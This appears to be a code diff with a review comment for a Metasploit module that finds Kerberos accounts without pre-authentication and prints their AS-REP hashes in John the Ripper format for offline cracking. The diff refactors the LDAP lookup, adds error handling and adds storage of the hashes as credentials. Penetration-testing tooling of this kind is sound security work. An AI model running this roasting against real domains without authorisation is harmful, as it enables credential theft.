@@ -58,11 +58,6 @@ def initialize(info = {})
5858 OptEnum . new ( 'LDAP::Auth' , [ true , 'The Authentication mechanism to use' , Msf ::Exploit ::Remote ::AuthOption ::NTLM , Msf ::Exploit ::Remote ::AuthOption ::LDAP_OPTIONS ] ) ,
5959 ]
6060 )
61-
62- default_config_file_path = File . join ( ::Msf ::Config . data_directory , 'auxiliary' , 'gather' , 'ldap_query' , 'ldap_queries_default.yaml' )
63- loaded_queries = safe_load_queries ( default_config_file_path ) || [ ]
64- asrep_roast_query = loaded_queries . select { |entry | entry [ 'action' ] == 'ENUM_USER_ASREP_ROASTABLE' }
65- self . ldap_query = asrep_roast_query [ 0 ]
6661 end
6762
6863 def run
@@ -72,6 +67,14 @@ def run
7267 when 'LDAP'
7368 run_ldap
7469 end
70+ rescue Errno ::ECONNRESET
71+ fail_with ( Failure ::Disconnected , 'The connection was reset.' )
72+ rescue Rex ::ConnectionError => e
73+ fail_with ( Failure ::Unreachable , e . message )
74+ rescue Rex ::Proto ::Kerberos ::Model ::Error ::KerberosError => e
75+ fail_with ( Failure ::NoAccess , e . message )
76+ rescue Net ::LDAP ::Error => e
77+ fail_with ( Failure ::Unknown , "#{ e . class } : #{ e . message } " )
7578 end
7679
7780 def run_brute
@@ -111,37 +114,12 @@ def run_brute
111114 end
112115
113116 def run_ldap
114- fail_with ( Msf ::Module ::Failure ::BadConfig , 'Must provide a username for connecting to LDAP' ) if datastore [ 'LDAPUsername' ] . blank?
115-
116- ldap_connect do |ldap |
117- validate_bind_success! ( ldap )
118- unless ( base_dn = ldap . base_dn )
119- fail_with ( Failure ::UnexpectedReply , "Couldn't discover base DN!" )
120- end
121-
122- schema_dn = ldap . schema_dn
123- filter_string = ldap_query [ 'filter' ]
124- attributes = ldap_query [ 'attributes' ]
117+ run_builtin_ldap_query ( 'ENUM_USER_ASREP_ROASTABLE' ) do |result |
118+ username = result . samaccountname [ 0 ]
125119 begin
126- filter = Net ::LDAP ::Filter . construct ( filter_string )
127- rescue StandardError => e
128- fail_with ( Failure ::BadConfig , "Could not compile the filter #{ filter_string } . Error was #{ e } " )
129- end
130-
131- print_line
132- result_count = perform_ldap_query_streaming ( ldap , filter , attributes , base_dn , schema_dn ) do |result , _attribute_properties |
133- username = result . samaccountname [ 0 ]
134- begin
135- roast ( username )
136- rescue ::Rex ::Proto ::Kerberos ::Model ::Error ::KerberosError => e
137- print_error ( "#{ username } reported as ASREP-roastable, but received error when attempting to retrieve TGT (#{ e } )" )
138- end
139- end
140- if result_count == 0
141- print_error ( "No entries could be found for #{ filter_string } !" )
142- else
143- print_line
144- print_good ( "Query returned #{ result_count } #{ 'result' . pluralize ( result_count ) } ." )
120+ roast ( username )
121+ rescue ::Rex ::Proto ::Kerberos ::Model ::Error ::KerberosError => e
122+ print_error ( "#{ username } reported as ASREP-roastable, but received error when attempting to retrieve TGT (#{ e } )" )
145123 end
146124 end
147125 end
@@ -157,6 +135,34 @@ def roast(username)
157135 )
158136 hash = format_as_rep_to_john_hash ( res . as_rep )
159137 print_line ( hash )
138+ jtr_format = Metasploit ::Framework ::Hashes . identify_hash ( hash )
139+ report_hash ( hash , jtr_format )
140+ end
141+
142+ def report_hash ( hash , jtr_format )
143+ service_data = {
144+ address : rhost ,
145+ port : rport ,
146+ service_name : 'Kerberos' ,
147+ protocol : 'tcp' ,
148+ workspace_id : myworkspace_id
149+ }
150+ credential_data = {
151+ module_fullname : fullname ,
152+ origin_type : :service ,
153+ private_data : hash ,
154+ private_type : :nonreplayable_hash ,
155+ jtr_format : jtr_format
156+ } . merge ( service_data )
157+
158+ credential_core = create_credential ( credential_data )
159+
160+ login_data = {
161+ core : credential_core ,
162+ status : Metasploit ::Model ::Login ::Status ::UNTRIED
163+ } . merge ( service_data )
164+
165+ create_credential_login ( login_data )
160166 end
161167
162168 def etypes
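Review bot: The credential built in `report_hash` has no public part, so the stored `:nonreplayable_hash` is not linked to the account it was issued for; `roast` has `username` in scope but passes only `hash` and `jtr_format`. Anyone working from the database afterwards, for example to list the accounts that need Kerberos pre-authentication enforced, has to recover the name from the hash string, if it is there at all. I would pass it through as `report_hash(hash, jtr_format, username)` and add `username: username` to `credential_data`; a realm key/value pair would fit as well if the domain is available in this module, which these lines do not show. Separately, `service_data` labels the service 'Kerberos' but takes its port from `rport`; if `rport` is the LDAP port under the LDAP action, the hash is attributed to the wrong service, so that is worth confirming. The body of `roast` begins outside this hunk.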